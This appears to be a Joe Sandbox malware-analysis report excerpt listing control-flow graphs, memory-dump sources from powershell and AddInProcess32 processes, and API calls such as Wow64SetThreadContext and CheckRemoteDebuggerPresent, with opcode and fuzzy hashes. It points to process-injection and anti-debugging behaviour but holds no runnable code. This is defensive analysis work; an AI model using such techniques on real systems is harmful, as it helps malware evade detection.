                                                                              • Instruction ID: 8798191c7fcf116df93c82ec8d51b0e97e2fd26180919bc55cbc8618e22c0770
                                                                              • Opcode Fuzzy Hash: 85953d0c4523d52595acb0dbe46d92ba81746bac8b284a3a3aa173ed76cd050e
                                                                              • Instruction Fuzzy Hash: 231167B1D202098FDB10CF9AC844BDEBBF4EB88310F64842AE418A3240D778A954CFA1

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 828 2879dc-288e80 830 288e8c-288eb8 Wow64SetThreadContext 828->830 831 288e82-288e8a 828->831 832 288eba-288ec0 830->832 833 288ec1-288ee2 830->833 831->830 832->833
                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,00288692), ref: 00288EAB
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.520168855.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_280000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0
                                                                              • Opcode ID: 6864cd747ac6edc562fa738dc9ad4fa3b5224edc84ad50e00f7a1d19c49119a9
                                                                              • Instruction ID: 63476f92f520642d4cc22656293087ad79cc02473ba17f71decd7b8091610584
                                                                              • Opcode Fuzzy Hash: 6864cd747ac6edc562fa738dc9ad4fa3b5224edc84ad50e00f7a1d19c49119a9
                                                                              • Instruction Fuzzy Hash: C21137B5D206098FDB10DF9AC844BDEBBF4EB89310F54842AE458A3240D778A955CFA5

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 835 3b127c-3b12bb 837 3b12c1-3b12c6 835->837 838 3b1496-3b14b7 835->838 839 3b12c8-3b12ce 837->839 840 3b12de-3b12e2 837->840 848 3b14b9-3b14be 838->848 849 3b14e4-3b151a 838->849 841 3b12d2-3b12dc 839->841 842 3b12d0 839->842 843 3b12e8-3b12ec 840->843 844 3b1443-3b144d 840->844 841->840 842->840 846 3b12ff 843->846 847 3b12ee-3b12fd 843->847 850 3b145b-3b1461 844->850 851 3b144f-3b1458 844->851 852 3b1301-3b1303 846->852 847->852 853 3b14c0-3b14c6 848->853 854 3b14d6-3b14e3 848->854 869 3b151c 849->869 870 3b1523-3b1537 849->870 855 3b1463-3b1465 850->855 856 3b1467-3b1473 850->856 852->844 859 3b1309-3b1329 852->859 860 3b14ca-3b14d4 853->860 861 3b14c8 853->861 862 3b1475-3b1493 855->862 856->862 874 3b132b-3b1346 859->874 875 3b1348 859->875 860->854 861->854 869->870 876 3b134a-3b134c 874->876 875->876 876->844 877 3b1352-3b1354 876->877 879 3b1356-3b1362 877->879 880 3b1364 877->880 881 3b1366-3b1368 879->881 880->881 881->844 883 3b136e-3b138e 881->883 886 3b1390-3b1396 883->886 887 3b13a6-3b13aa 883->887 888 3b139a-3b139c 886->888 889 3b1398 886->889 890 3b13ac-3b13b2 887->890 891 3b13c4-3b13c8 887->891 888->887 889->887 892 3b13b6-3b13c2 890->892 893 3b13b4 890->893 894 3b13cf-3b13d1 891->894 892->891 893->891 895 3b13e9-3b1440 894->895 896 3b13d3-3b13d9 894->896 898 3b13db 896->898 899 3b13dd-3b13df 896->899 898->895 899->895
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.520260675.00000000003B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_3b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @#|e
                                                                              • API String ID: 0-1040833717
                                                                              • Opcode ID: 8f3162a9ae73776e810e43fa2ec74018e5e022c47833fc1167414c20e593f952
                                                                              • Instruction ID: b635ed77f705de3eda5b3e4332edece707f27b3a8261c4939afcd1138d079b0a
                                                                              • Opcode Fuzzy Hash: 8f3162a9ae73776e810e43fa2ec74018e5e022c47833fc1167414c20e593f952
                                                                              • Instruction Fuzzy Hash: 21310534A04305CFDF269A25D5303FA77F5AF90308FA64066CA08DBD81EB35CA40C762

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 901 3b3054-3b3082 902 3b3088-3b308d 901->902 903 3b322c-3b325c 901->903 904 3b308f-3b3095 902->904 905 3b30a5-3b30a9 902->905 911 3b325e-3b327b 903->911 912 3b3295-3b329f 903->912 906 3b3099-3b30a3 904->906 907 3b3097 904->907 909 3b30af-3b30b3 905->909 910 3b31d4-3b31de 905->910 906->905 907->905 913 3b30f3 909->913 914 3b30b5-3b30c6 909->914 915 3b31ec-3b31f2 910->915 916 3b31e0-3b31e9 910->916 929 3b327d-3b328f 911->929 930 3b32e5-3b32ea 911->930 921 3b32a8-3b32ae 912->921 922 3b32a1-3b32a5 912->922 917 3b30f5-3b30f7 913->917 914->903 931 3b30cc-3b30d1 914->931 919 3b31f8-3b3204 915->919 920 3b31f4-3b31f6 915->920 917->910 928 3b30fd-3b3101 917->928 925 3b3206-3b3229 919->925 920->925 926 3b32b0-3b32b2 921->926 927 3b32b4-3b32c0 921->927 933 3b32c2-3b32e2 926->933 927->933 928->910 934 3b3107-3b310b 928->934 929->912 930->929 935 3b30e9-3b30f1 931->935 936 3b30d3-3b30d9 931->936 934->910 939 3b3111-3b3137 934->939 935->917 942 3b30db 936->942 943 3b30dd-3b30e7 936->943 939->910 949 3b313d-3b3141 939->949 942->935 943->935 950 3b3143-3b314c 949->950 951 3b3164 949->951 953 3b314e-3b3151 950->953 954 3b3153-3b3160 950->954 952 3b3167-3b3174 951->952 957 3b317a-3b31d1 952->957 955 3b3162 953->955 954->955 955->952
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.520260675.00000000003B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_3b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @#|e
                                                                              • API String ID: 0-1040833717
                                                                              • Opcode ID: d7c0d0906af10da23c7396dee30c93c8b4807d0667a1ca881c73ea75203b4412
                                                                              • Instruction ID: de7ea9b52a719a3a07227a85a095d78d94d03847bf2cd8d91727cbbd521e874f
                                                                              • Opcode Fuzzy Hash: d7c0d0906af10da23c7396dee30c93c8b4807d0667a1ca881c73ea75203b4412
                                                                              • Instruction Fuzzy Hash: 8231D130A00228DFDF26EF1DC844BEAB7A9BF44318F258069E6159BA90CB74DE41CB41
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.520260675.00000000003B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_3b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @#|e
                                                                              • API String ID: 0-1040833717
                                                                              • Opcode ID: d96a26110998d483c548af3bf56022497d5d1d4dc2ef01bed2d9e975b10b2461
                                                                              • Instruction ID: d469596738a9949eab8beb944a34761fb58c966b0636a609043fe8c3038ef859
                                                                              • Opcode Fuzzy Hash: d96a26110998d483c548af3bf56022497d5d1d4dc2ef01bed2d9e975b10b2461
                                                                              • Instruction Fuzzy Hash: 0B21D330A00205DFDF25DF66C444BEB77A1BF94358F1A826AD628CBA20D734DD81CB91
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.520260675.00000000003B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_3b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @#|e
                                                                              • API String ID: 0-1040833717
                                                                              • Opcode ID: 600a708baef8af26608eafe4cc3b0a8d5968942e2aa5aedd6e8d84d5f0836d72
                                                                              • Instruction ID: 1a7faf6202ffbf73d9d379b677e1454490e9ffaa3712ed223ea8e43e9157bca4
                                                                              • Opcode Fuzzy Hash: 600a708baef8af26608eafe4cc3b0a8d5968942e2aa5aedd6e8d84d5f0836d72
                                                                              • Instruction Fuzzy Hash: 2311C434A04305CFCF638F29C5006EB7BB4AF92319F2A46AACA54DB945D7358945CB91
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.520260675.00000000003B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_3b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a4f62f8d515a574bc4e6352dd999755d10c757876c81a17b840894cce99e9ac0
                                                                              • Instruction ID: 0f1caeb03c70cf4e0a8671ed09424fd0065ad421556177dd679c08c2064459ce
                                                                              • Opcode Fuzzy Hash: a4f62f8d515a574bc4e6352dd999755d10c757876c81a17b840894cce99e9ac0
                                                                              • Instruction Fuzzy Hash: 0D51E931B083808FD7169B64C860BAABBB1EF86314F19C4DBD648DF2A3C6729D41C761
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.519946115.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_1cd000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b498d8da79b99ec4be962503405349e19a88e8fe508db17684b5a7f6ba03725b
                                                                              • Instruction ID: b3d7fc2320e061f5aaaa0bc80192c6ea80c571bf1fcc92e540988b808f6c90b4
                                                                              • Opcode Fuzzy Hash: b498d8da79b99ec4be962503405349e19a88e8fe508db17684b5a7f6ba03725b
                                                                              • Instruction Fuzzy Hash: A5015E7140D3C09FE7124B259C95B52BFA8EF53724F1985DBE8848F1A3C2689C45CB72
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.519946115.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_1cd000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1f2482eb28ace2ae26bfe0430ee76bbf06b8f510fa191cd1ba0e1b06351a06f5
                                                                              • Instruction ID: 9a4a19094a5c0e4a57cced60632b39a2821cdfc9f2fdcf09d46f13aba7d7ca58
                                                                              • Opcode Fuzzy Hash: 1f2482eb28ace2ae26bfe0430ee76bbf06b8f510fa191cd1ba0e1b06351a06f5
                                                                              • Instruction Fuzzy Hash: 0301D471104340EAE7144A29DC84B67BBD8DF61764F18C52EEC480B182C379D942CAB1
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.520260675.00000000003B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_3b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bd4cac4d81d8029f5242d95191f943adc08ddc617ac62439c3841b93b9b0b34b
                                                                              • Instruction ID: 6577483faea23ba75172badf82e7edf77ef6b7344838747beb6f5a6a0c44e130
                                                                              • Opcode Fuzzy Hash: bd4cac4d81d8029f5242d95191f943adc08ddc617ac62439c3841b93b9b0b34b
                                                                              • Instruction Fuzzy Hash: 2F01AAA540E3C18FDB2757744C796563F71AEA7205B5A00EBC0C29F0E3D0185959DB63
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.520260675.00000000003B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_3b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (:,$(:,$(:,$@#|e$@#|e$@#|e$@#|e$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L:,$L:,$L:,
                                                                              • API String ID: 0-1621129138
                                                                              • Opcode ID: 1ecad4d8444de8c5031f99edc8fa9604b6dc2e8ffaf52289977aa64e997686af
                                                                              • Instruction ID: fd4c975a183b25e45462740af4103cef15943a2d7263c105fb9b98628b431280
                                                                              • Opcode Fuzzy Hash: 1ecad4d8444de8c5031f99edc8fa9604b6dc2e8ffaf52289977aa64e997686af
                                                                              • Instruction Fuzzy Hash: 35E13431B00204DFDF2A9F64D8547EF77A2AFC1314F15846AEA459B691DB70DD40CBA2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.520260675.00000000003B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_3b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @#|e$L4#p$L4#p$L4#p$L:,$L:,
                                                                              • API String ID: 0-66566924
                                                                              • Opcode ID: b715406dd5e294f8787eae0cff18cb2a3719540a314e22b35ceff7666f7a8406
                                                                              • Instruction ID: 2ae6ce37e8545852a65a25ee4cb4c0527efef9fe5cf7906968ad3f111776cb8b
                                                                              • Opcode Fuzzy Hash: b715406dd5e294f8787eae0cff18cb2a3719540a314e22b35ceff7666f7a8406
                                                                              • Instruction Fuzzy Hash: D9410235600208EFDF2A8E65D4447FF77A6AB40318F1A8065EA099BA91D774DD84CF91
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.520260675.00000000003B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_3b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @#|e$@#|e$L4#p$L4#p$L4#p
                                                                              • API String ID: 0-2427159599
                                                                              • Opcode ID: db50862b68fb549273d0269df9c47cf744ceba9fd29f9123e9e2babf59ae801d
                                                                              • Instruction ID: b1edabcc7460347efdfae32b37df8a29aa6611699678296c64859aa71c36bd31
                                                                              • Opcode Fuzzy Hash: db50862b68fb549273d0269df9c47cf744ceba9fd29f9123e9e2babf59ae801d
                                                                              • Instruction Fuzzy Hash: 1F614530700244AFDB1A9F64D8507EFBBA2AFC1304F15806AEA459B291DF74ED50CBA1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.520260675.00000000003B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_3b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @#|e$@#|e$L4#p$L4#p$L4#p
                                                                              • API String ID: 0-2427159599
                                                                              • Opcode ID: 6e561a3747efc81511fae867b60ff38abaa4d7cda0c5a96f7d7dfc9defe850e4
                                                                              • Instruction ID: 93c6a6ecd879ce641ed40f45f454689e67f402933d1c1485e83ef2eccc960497
                                                                              • Opcode Fuzzy Hash: 6e561a3747efc81511fae867b60ff38abaa4d7cda0c5a96f7d7dfc9defe850e4
                                                                              • Instruction Fuzzy Hash: DF511F31700264EBDB278F24D8407FE77A6AF80318F158069EA098B691DF75DF40C7A2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.520260675.00000000003B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_3b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @#|e$L4#p$L4#p$L4#p
                                                                              • API String ID: 0-258036331
                                                                              • Opcode ID: 17c5892f5a00e91beacf65de5307a641bf27c20ad7a1bf9b39137fa073a64855
                                                                              • Instruction ID: c66a3acd944fd580ea90500a1f2d3380d30c887c59e2a8c44ba3d037f42547fd
                                                                              • Opcode Fuzzy Hash: 17c5892f5a00e91beacf65de5307a641bf27c20ad7a1bf9b39137fa073a64855
                                                                              • Instruction Fuzzy Hash: BB41E530600248AFDF2A8F54C9407FFB7A5EF81319F158065EA449B691DB74ED91CFA1

                                                                              Execution Graph

                                                                              Execution Coverage:12.4%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:3
                                                                              Total number of Limit Nodes:0
                                                                              execution_graph 12825 2d5330 12826 2d5374 CheckRemoteDebuggerPresent 12825->12826 12827 2d53b6 12826->12827

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1788 2d5330-2d53b4 CheckRemoteDebuggerPresent 1790 2d53bd-2d53f8 1788->1790 1791 2d53b6-2d53bc 1788->1791 1791->1790
                                                                              APIs
                                                                              • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 002D53A7
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.622570103.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_2d0000_AddInProcess32.jbxd
                                                                              Similarity
                                                                              • API ID: CheckDebuggerPresentRemote
                                                                              • String ID:
                                                                              • API String ID: 3662101638-0
                                                                              • Opcode ID: 4b03bc10814d6c36fb7ea4c1acfa81124cf7554b1694292bf85c4e8e5665f778
                                                                              • Instruction ID: 0301aa10cf8e341176c0149f10c6091c02883ccaafefab4fbbcbf08efe53f758
                                                                              • Opcode Fuzzy Hash: 4b03bc10814d6c36fb7ea4c1acfa81124cf7554b1694292bf85c4e8e5665f778
                                                                              • Instruction Fuzzy Hash: EB21487180161ACFDB00CF9AD884BEEBBF4AF49214F24846AD454A7350D778AA44CF60

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 6342eb-634317 2 634319-63431c 0->2 3 63432b-63432e 2->3 4 63431e call 6345b8 2->4 5 634361-634364 3->5 6 634330-63435c 3->6 7 634324-634326 4->7 8 634381-634383 5->8 9 634366-63437c 5->9 6->5 7->3 10 634385 8->10 11 63438a-63438d 8->11 9->8 10->11 11->2 13 63438f-63439e 11->13 16 634432-634447 13->16 17 6343a4-6343ae 13->17 23 634448 16->23 18 6343b0-634416 17->18 19 63441d-63442c 17->19 18->19 19->16 19->17 23->23
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.623785794.0000000000630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_630000_AddInProcess32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: `3O$`3O$|4O
                                                                              • API String ID: 0-948522560
                                                                              • Opcode ID: 5147be9b0d3b8322120b1ddf5ec9b4e4cca718cb925b39549207572748148171
                                                                              • Instruction ID: 7cd1f055164065553151d1eccb23d8ccf28726dd0c98834e8537a6fdeb5727a8
                                                                              • Opcode Fuzzy Hash: 5147be9b0d3b8322120b1ddf5ec9b4e4cca718cb925b39549207572748148171
                                                                              • Instruction Fuzzy Hash: 7F419E30A107499FDB11EF79C495AAEBBF6EF96300F118526E805EB351DB70B846CB81

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 33 634300-634317 34 634319-63431c 33->34 35 63432b-63432e 34->35 36 63431e call 6345b8 34->36 37 634361-634364 35->37 38 634330-63435c 35->38 39 634324-634326 36->39 40 634381-634383 37->40 41 634366-63437c 37->41 38->37 39->35 42 634385 40->42 43 63438a-63438d 40->43 41->40 42->43 43->34 45 63438f-63439e 43->45 48 634432-634447 45->48 49 6343a4-6343ae 45->49 55 634448 48->55 50 6343b0-634416 49->50 51 63441d-63442c 49->51 50->51 51->48 51->49 55->55
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.623785794.0000000000630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_630000_AddInProcess32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: `3O$`3O$|4O
                                                                              • API String ID: 0-948522560
                                                                              • Opcode ID: 13a1b86a9f51f345446dcf3d26da3e72852b6bab54684293bfd5549e1acb46b3
                                                                              • Instruction ID: 5d3e3f6da3547a6004bb39aa89463dd01704960e8f5bcffea2b0848b6253b276
                                                                              • Opcode Fuzzy Hash: 13a1b86a9f51f345446dcf3d26da3e72852b6bab54684293bfd5549e1acb46b3
                                                                              • Instruction Fuzzy Hash: 96313A30A107098BDB14EFA9C485AAEF7B6EF95300F10892AE915EB344DB70B945CB81

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1658 6306c0-6306dc 1659 6306de-6306e1 1658->1659 1660 6306e3-6306ff 1659->1660 1661 630704-630706 1659->1661 1660->1661 1662 630708 1661->1662 1663 63070d-630710 1661->1663 1662->1663 1663->1659 1665 630712-63082d 1663->1665 1684 630839-630848 1665->1684 1685 63082f-630833 1665->1685 1686 630ca6-630cb0 1684->1686 1687 63084e-630857 1684->1687 1685->1684 1688 63085d-630868 1687->1688 1689 630c9c-630ca1 1687->1689 1690 630c76-630c82 1688->1690 1691 63086e-630885 1688->1691 1689->1686 1690->1687 1692 630c88 1690->1692 1691->1690 1695 63088b-630894 1691->1695 1692->1686 1695->1689 1696 63089a-6308bf 1695->1696 1699 6308c5-6308dc 1696->1699 1700 630c64-630c70 1696->1700 1699->1700 1702 6308e2-6308eb 1699->1702 1700->1690 1700->1695 1702->1689 1703 6308f1-63090b 1702->1703 1705 630912-630914 1703->1705 1706 630916-630926 1705->1706 1707 63095e-630971 1705->1707 1712 630976-6309a9 1706->1712 1713 630928-630938 1706->1713 1708 630c40-630c44 1707->1708 1710 630c46 1708->1710 1711 630c4f-630c5e 1708->1711 1710->1711 1711->1700 1711->1702 1722 6309eb-6309fb 1712->1722 1723 6309ab-6309e9 1712->1723 1713->1712 1717 63093a-63094a 1713->1717 1717->1712 1721 63094c-63095c 1717->1721 1721->1707 1721->1712 1727 630a13-630a28 1722->1727 1728 6309fd-630a03 1722->1728 1733 630a2a-630a91 1723->1733 1727->1733 1729 630a07-630a09 1728->1729 1730 630a05 1728->1730 1729->1727 1730->1727 1742 630b43-630b63 1733->1742 1743 630a97-630a9a 1733->1743 1752 630b65-630ba6 1742->1752 1753 630bbb-630bc7 1742->1753 1744 630c21-630c26 1743->1744 1745 630aa0-630ab0 1743->1745 1754 630c2b-630c3e 1744->1754 1750 630ab6-630b0b 1745->1750 1751 630b39-630b3d 1745->1751 1750->1744 1777 630b11-630b2b 1750->1777 1751->1742 1751->1743 1752->1744 1775 630ba8-630bb9 1752->1775 1758 630bc9-630bcf 1753->1758 1759 630bdf-630bf4 1753->1759 1754->1708 1761 630bd3-630bd5 1758->1761 1762 630bd1 1758->1762 1767 630bf6-630c1f 1759->1767 1761->1759 1762->1759 1767->1754 1775->1767 1777->1744 1780 630b31-630b37 1777->1780 1780->1742
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.623785794.0000000000630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_630000_AddInProcess32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: &55p
                                                                              • API String ID: 0-1955183375
                                                                              • Opcode ID: 0f7243817fa183c0cd62584ccb21cb855e0f8c5969e27860c9ce32721ba75c29
                                                                              • Instruction ID: fb28c0fb3c144003055297b45f18f812d15903e8873e7b3f5f78f74d75461b4b
                                                                              • Opcode Fuzzy Hash: 0f7243817fa183c0cd62584ccb21cb855e0f8c5969e27860c9ce32721ba75c29
                                                                              • Instruction Fuzzy Hash: 92F13E30A01204CFEB18EFA5D4A5B6EB7B7BF84314F248569D405AB369DB35EC46CB90

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1781 2d5328-2d53b4 CheckRemoteDebuggerPresent 1784 2d53bd-2d53f8 1781->1784 1785 2d53b6-2d53bc 1781->1785 1785->1784
                                                                              APIs
                                                                              • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 002D53A7
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.622570103.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_2d0000_AddInProcess32.jbxd
                                                                              Similarity
                                                                              • API ID: CheckDebuggerPresentRemote
                                                                              • String ID:
                                                                              • API String ID: 3662101638-0
                                                                              • Opcode ID: bcf305b10c1e36b26b436182ecb6ce094a874d384929068998b5dd23f34b710f
                                                                              • Instruction ID: 2209b85e5184362d6ed79ec2b75540d243ea6b66dd8cb0b43eb7cedaaba73521
                                                                              • Opcode Fuzzy Hash: bcf305b10c1e36b26b436182ecb6ce094a874d384929068998b5dd23f34b710f
                                                                              • Instruction Fuzzy Hash: 4E214A7180165ACFDB00CF9AD884BEEFBF4AF49214F24846AD854B7351D7789A44CF60

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1794 631ab0-631acf 1795 631ad1-631ad4 1794->1795 1796 631d01-631d04 1795->1796 1797 631ada-631ae9 1795->1797 1798 631dbb-631dbe 1796->1798 1799 631d0a-631d16 1796->1799 1806 631aeb-631b06 1797->1806 1807 631b08-631b43 1797->1807 1801 631de1-631de3 1798->1801 1802 631dc0-631ddc 1798->1802 1805 631d21-631d23 1799->1805 1803 631de5 1801->1803 1804 631dea-631ded 1801->1804 1802->1801 1803->1804 1804->1795 1809 631df3-631dfc 1804->1809 1810 631d25-631d2b 1805->1810 1811 631d3b-631d42 1805->1811 1806->1807 1820 631cd5-631ceb 1807->1820 1821 631b49-631b5a 1807->1821 1813 631d2f-631d31 1810->1813 1814 631d2d 1810->1814 1816 631d53 1811->1816 1817 631d44-631d51 1811->1817 1813->1811 1814->1811 1818 631d58-631d5a 1816->1818 1817->1818 1822 631d71-631daa 1818->1822 1823 631d5c-631d5f 1818->1823 1820->1796 1829 631cc0-631ccf 1821->1829 1830 631b60-631b7d 1821->1830 1822->1797 1838 631db0-631dba 1822->1838 1823->1809 1829->1820 1829->1821 1830->1829 1836 631b83-631c7a 1830->1836 1861 631c88 1836->1861 1862 631c7c-631c86 1836->1862 1863 631c8d-631c8f 1861->1863 1862->1863 1863->1829 1864 631c91-631c96 1863->1864 1865 631ca4 1864->1865 1866 631c98-631ca2 1864->1866 1867 631ca9-631cab 1865->1867 1866->1867 1867->1829 1868 631cad-631cb9 1867->1868 1868->1829
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.623785794.0000000000630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_630000_AddInProcess32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: H'O
                                                                              • API String ID: 0-3178162958
                                                                              • Opcode ID: 34fd06b6d8a69fba74497e0fdbca40fba8bb874fc5b5b2c1f0ac635cf27fc050
                                                                              • Instruction ID: 4cd1cb57d303f1bcc3d2cf9e70c966c4fb4eab5ee966dd9b3dd089b2a3d2217a
                                                                              • Opcode Fuzzy Hash: 34fd06b6d8a69fba74497e0fdbca40fba8bb874fc5b5b2c1f0ac635cf27fc050
                                                                              • Instruction Fuzzy Hash: B9816B31B006098FDB18EF65D4957AEB7E7EF85340F248829E806DB394DB75ED428B90

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
